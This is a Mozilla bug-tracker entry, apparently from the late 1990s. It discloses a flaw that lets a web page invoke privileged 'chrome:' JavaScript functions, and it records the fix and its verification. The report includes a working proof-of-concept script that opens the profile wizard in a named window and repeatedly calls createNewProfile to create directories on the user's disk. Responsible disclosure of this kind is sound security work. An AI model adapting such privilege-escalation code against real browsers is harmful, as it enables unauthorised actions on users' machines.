Closed Bug 21923 Opened 26 years ago Closed 26 years ago

Executing functions in "chrome:" protocol - #2.

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

There is another chrome vulnerability, which allows executing JavaScript functions in the "chrome:" protocol. This is dangerous because such functions have much more priviligies than JavaScript functions loaded from a web page. If one opens a "chrome:" url in a window, he have access to all functions in the window and the functions are executed by "windowname.functionname()" in the "chrome:" protocol. Some of the predefined functions in the Mozilla chrome may do dangerous things. The code is: ---------------------------------------------------------------------- <SCRIPT> b=window.open("","victim"); function g() { b.profile.createNewProfile("georgi","c:\\georgi\\"); alert("Profile created! You'd better close this window because directories are created"); } setInterval("g()",4000); </SCRIPT> <A HREF="chrome://profile/content/createProfileWizard.xul" TARGET="victim">Follow this link for demonstration</A> ----------------------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M13
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Added call to CheckLoadURI from TriggerLink.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.